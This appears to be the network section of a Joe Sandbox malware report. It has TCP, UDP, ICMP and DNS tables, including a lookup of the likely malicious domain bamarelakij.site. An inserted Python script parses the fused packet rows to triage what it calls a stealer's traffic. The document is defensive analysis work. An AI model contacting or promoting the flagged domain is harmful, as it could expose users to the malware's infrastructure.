                                                                                                                                                                Jan 9, 2025 14:43:34.732808113 CET44350055104.70.121.192192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.733181953 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:34.733221054 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.733323097 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:34.733644962 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:34.733654022 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.187452078 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.193500042 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.193512917 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.194798946 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.194899082 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.195241928 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.195341110 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.246100903 CET50099443192.168.2.7104.70.121.217
                                                                                                                                                                Jan 9, 2025 14:43:35.246118069 CET44350099104.70.121.217192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:35.293163061 CET50099443192.168.2.7104.70.121.217
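Page exports of these packet tables tend to run the five columns together (timestamp, source port, destination port, source IP, destination IP with no separator), which makes the records ambiguous: "50094443" could be 5009/4443 as well as 50094/443, and "192.168.2.7172.64.41.3" could end in 192.168.2.71. The script below is an added example, not part of the report or of Joe Sandbox. It resolves that ambiguity with three labelled assumptions (the analysis VM is 192.168.2.7, which is the address in every record; one side of each packet is a well-known service port; the VM side uses the Windows dynamic port range 49152-65535), refuses to guess when a record is still a tie, and then reduces the records to remote endpoints with packet and connection counts, which is the first thing to look at when triaging a stealer's network activity. The sample records are copied from the tables of this report; the functions `parse_record` and `summarise` are hypothetical names introduced here.

```python
"""Parse fused Joe Sandbox packet-table rows and summarise remote endpoints.
Added example, not from the report. LOCAL_IP, SERVICE_PORTS and EPHEMERAL_MIN
are assumptions used only to disambiguate the missing column separators."""
import re
from itertools import product

LOCAL_IP = "192.168.2.7"                  # assumption: analysis VM address
SERVICE_PORTS = {53, 80, 123, 138, 443}   # assumption: one side is a service port
EPHEMERAL_MIN = 49152                     # assumption: Windows dynamic port range

# Constructed sample: ten records copied from the TCP and UDP tables of this report.
SAMPLE = """\
Jan 9, 2025 14:43:11.776730061 CET50094443192.168.2.7104.21.80.52
Jan 9, 2025 14:43:11.776757956 CET44350094104.21.80.52192.168.2.7
Jan 9, 2025 14:43:12.121226072 CET50095443192.168.2.7104.21.80.52
Jan 9, 2025 14:43:13.046310902 CET50096443192.168.2.7104.21.80.52
Jan 9, 2025 14:43:14.042972088 CET50097443192.168.2.7104.21.80.52
Jan 9, 2025 14:42:21.057095051 CET6276553192.168.2.71.1.1.1
Jan 9, 2025 14:42:21.071046114 CET53627651.1.1.1192.168.2.7
Jan 9, 2025 14:41:15.262566090 CET123123192.168.2.7104.40.149.189
Jan 9, 2025 14:42:36.386332035 CET61689443192.168.2.7172.64.41.3
Jan 9, 2025 14:42:36.852771044 CET44361689172.64.41.3192.168.2.7
"""

REC_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]+)(?P<rest>\d[\d.]*)$")


def _octet_ok(s):
    return s.isdigit() and len(s) <= 3 and int(s) <= 255 and (s == "0" or s[0] != "0")


def _port_ok(s):
    return s.isdigit() and len(s) <= 5 and 1 <= int(s) <= 65535 and s[0] != "0"


def _splits(s, checks):
    """All ways to cut digit string s into len(checks) non-empty parts, part i passing checks[i]."""
    if len(checks) == 1:
        return [(s,)] if checks[0](s) else []
    return [(s[:i],) + rest for i in range(1, len(s))
            if checks[0](s[:i]) for rest in _splits(s[i:], checks[1:])]


def parse_record(line):
    """Return (timestamp, sport, dport, src_ip, dst_ip), or None if unparsable or ambiguous."""
    line = line.strip()
    if " | " in line:                                  # row already column-separated
        p = [x.strip() for x in line.split("|")]
        if len(p) == 5 and p[1].isdigit() and p[2].isdigit():
            return p[0], int(p[1]), int(p[2]), p[3], p[4]
        return None
    m = REC_RE.match(line)
    if not m:
        return None
    c = m["rest"].split(".")
    # Two fused dotted quads plus two ports give exactly seven chunks:
    # [sport+dport+a] b c [d+e] f g h, with a.b.c.d the source and e.f.g.h the destination.
    if len(c) != 7 or not all(_octet_ok(x) for x in (c[1], c[2], c[4], c[5], c[6])):
        return None
    ranked = []
    for (p1, p2, a), (d, e) in product(_splits(c[0], [_port_ok, _port_ok, _octet_ok]),
                                       _splits(c[3], [_octet_ok, _octet_ok])):
        sport, dport = int(p1), int(p2)
        src, dst = f"{a}.{c[1]}.{c[2]}.{d}", f"{e}.{c[4]}.{c[5]}.{c[6]}"
        score = ((src == LOCAL_IP) + (dst == LOCAL_IP)
                 + (sport in SERVICE_PORTS) + (dport in SERVICE_PORTS)
                 + (sport >= EPHEMERAL_MIN) + (dport >= EPHEMERAL_MIN))
        ranked.append((score, (m["ts"], sport, dport, src, dst)))
    ranked.sort(key=lambda t: t[0], reverse=True)
    if not ranked or (len(ranked) > 1 and ranked[0][0] == ranked[1][0]):
        return None                                    # no valid split, or a tie: do not guess
    return ranked[0][1]


def summarise(text):
    """Map each remote (ip, port) to its packet count and the set of VM-side ports used."""
    flows, unparsed = {}, 0
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec is None:
            unparsed += 1
            continue
        _, sport, dport, src, dst = rec
        remote, local_port = ((dst, dport), sport) if src == LOCAL_IP else ((src, sport), dport)
        entry = flows.setdefault(remote, {"packets": 0, "local_ports": set()})
        entry["packets"] += 1
        entry["local_ports"].add(local_port)
    return flows, unparsed


if __name__ == "__main__":
    flows, unparsed = summarise(SAMPLE)
    for (ip, port), e in sorted(flows.items(), key=lambda kv: -kv[1]["packets"]):
        print(f"{ip}:{port}  packets={e['packets']}  connections={len(e['local_ports'])}")
    print(f"unparsed records: {unparsed}")
```

Run over the full TCP table, the connection count per remote is the useful number: four separate TLS sessions on consecutive VM ports 50094 to 50097 to the same Cloudflare-fronted address within three seconds is the short request-per-connection pattern a stealer's upload or check-in produces, while the 1.1.1.1:53 and 104.40.149.189:123 entries are the guest's own DNS and NTP traffic and can be filtered out before pivoting on the rest.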
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 14:41:15.262566090 CET | 123 | 123 | 192.168.2.7 | 104.40.149.189
Jan 9, 2025 14:41:15.796591997 CET | 123 | 123 | 104.40.149.189 | 192.168.2.7
Jan 9, 2025 14:41:16.793083906 CET | 123 | 123 | 192.168.2.7 | 104.40.149.189
Jan 9, 2025 14:41:16.976675034 CET | 123 | 123 | 104.40.149.189 | 192.168.2.7
Jan 9, 2025 14:42:11.049717903 CET | 138 | 138 | 192.168.2.7 | 192.168.2.255
Jan 9, 2025 14:42:21.057095051 CET | 62765 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:21.071046114 CET | 53 | 62765 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:31.491338015 CET | 60224 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:31.491509914 CET | 58153 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:31.498169899 CET | 53 | 58153 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:32.696388960 CET | 53848 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:32.696909904 CET | 51263 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.598686934 CET | 54481 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.598921061 CET | 59839 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.605421066 CET | 53 | 59839 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:33.605789900 CET | 53 | 54481 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:33.610166073 CET | 54249 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.610323906 CET | 54035 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.617542028 CET | 53 | 54035 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:33.619101048 CET | 65534 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.619242907 CET | 60729 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.630526066 CET | 62255 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.630708933 CET | 49933 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:33.637399912 CET | 53 | 49933 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:35.766357899 CET | 63326 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:35.766936064 CET | 50604 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:35.768549919 CET | 65039 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:35.769061089 CET | 56365 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:35.773019075 CET | 53 | 63326 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:35.773865938 CET | 53 | 50604 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:35.775172949 CET | 64978 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:35.775321007 CET | 49376 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 14:42:35.775511980 CET | 53 | 65039 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:35.775551081 CET | 53 | 56365 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:35.782345057 CET | 53 | 64978 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:35.783341885 CET | 53 | 49376 | 1.1.1.1 | 192.168.2.7
Jan 9, 2025 14:42:36.386332035 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.698733091 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.852771044 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.853344917 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.853420973 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.853465080 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.855263948 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.855568886 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.856059074 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.856425047 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.856869936 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.857002974 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.857223034 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.953156948 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.953186035 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.953196049 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.953206062 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.953289032 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:42:36.953846931 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.953950882 CET | 61689 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:42:36.956825018 CET | 443 | 61689 | 172.64.41.3 | 192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.957886934 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.958528042 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.958755016 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.959482908 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.959846020 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.960099936 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.002806902 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.051609993 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.080020905 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.309247971 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.454102039 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.454535961 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.454607964 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.454643965 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.455018044 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.456336021 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.456671000 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.456671000 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.457287073 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.491430044 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.491624117 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.520122051 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.520256042 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.548434019 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.548630953 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.549973011 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.549988031 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.549995899 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.550005913 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.550018072 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.551357985 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.551407099 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.551408052 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.553009033 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.554989100 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.555107117 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.573980093 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.574525118 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.590380907 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.591641903 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.592547894 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.593034029 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.618808985 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.619401932 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.619895935 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.620068073 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.645031929 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.648194075 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.648679018 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.648829937 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.649260998 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.656043053 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.656832933 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.656884909 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.657371044 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.683640003 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.937994957 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:37.938373089 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.037256956 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.037837029 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.038018942 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.038431883 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.457026005 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.457256079 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.555881977 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.557559013 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.557579041 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.559021950 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.924864054 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.925352097 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.925589085 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:38.925774097 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.023674011 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.024774075 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.024787903 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.025082111 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.025202036 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.025274038 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.026297092 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.028745890 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.029876947 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:39.126811981 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.127584934 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.128598928 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.129453897 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.129616022 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:50.858908892 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:50.859040976 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:50.957554102 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:50.958420038 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:50.960875034 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:50.961070061 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:52.697797060 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:52.698272943 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:52.796813965 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:52.800131083 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:52.800143003 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:52.800582886 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:53.791963100 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:53.792756081 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:53.794047117 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:53.794655085 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:53.888844967 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.889652014 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.889882088 CET44356226162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.890054941 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.890233994 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:53.890566111 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.890995979 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.891587019 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.891846895 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.043574095 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.043726921 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.044348955 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.044523954 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.371579885 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.539642096 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539668083 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539689064 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539695024 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539696932 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.540467978 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.540559053 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.540663004 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.540663004 CET55481443192.168.2.7172.64.41.3
Jan 9, 2025 14:43:34.634254932 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:34.634350061 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:34.634865999 CET | 55481 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:43:34.730176926 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:34.731008053 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:34.731514931 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:34.731671095 CET | 55481 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:43:36.122139931 CET | 55481 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:43:36.122240067 CET | 55481 | 443 | 192.168.2.7 | 172.64.41.3
Jan 9, 2025 14:43:36.216937065 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:36.218000889 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:36.218034983 CET | 443 | 55481 | 172.64.41.3 | 192.168.2.7
Jan 9, 2025 14:43:36.218672991 CET | 55481 | 443 | 192.168.2.7 | 172.64.41.3
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 9, 2025 14:42:35.025966883 CET | 192.168.2.7 | 1.1.1.1 | c2a3 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 14:42:21.057095051 CET | 192.168.2.7 | 1.1.1.1 | 0xf30 | Standard query (0) | bamarelakij.site | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:31.491338015 CET | 192.168.2.7 | 1.1.1.1 | 0x9dc2 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:31.491509914 CET | 192.168.2.7 | 1.1.1.1 | 0x5227 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:32.696388960 CET | 192.168.2.7 | 1.1.1.1 | 0x9e10 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:32.696909904 CET | 192.168.2.7 | 1.1.1.1 | 0xeb94 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:33.598686934 CET | 192.168.2.7 | 1.1.1.1 | 0x6ae4 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.598921061 CET | 192.168.2.7 | 1.1.1.1 | 0x51a1 | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:33.610166073 CET | 192.168.2.7 | 1.1.1.1 | 0xa52 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.610323906 CET | 192.168.2.7 | 1.1.1.1 | 0x44e7 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:33.619101048 CET | 192.168.2.7 | 1.1.1.1 | 0xbea | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.619242907 CET | 192.168.2.7 | 1.1.1.1 | 0xe0a | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:33.630526066 CET | 192.168.2.7 | 1.1.1.1 | 0x4f8a | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.630708933 CET | 192.168.2.7 | 1.1.1.1 | 0x61b8 | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:35.766357899 CET | 192.168.2.7 | 1.1.1.1 | 0xba68 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.766936064 CET | 192.168.2.7 | 1.1.1.1 | 0x9cf | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:35.768549919 CET | 192.168.2.7 | 1.1.1.1 | 0x6e0b | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.769061089 CET | 192.168.2.7 | 1.1.1.1 | 0xcb1a | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:35.775172949 CET | 192.168.2.7 | 1.1.1.1 | 0xba2b | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.775321007 CET | 192.168.2.7 | 1.1.1.1 | 0xafc5 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
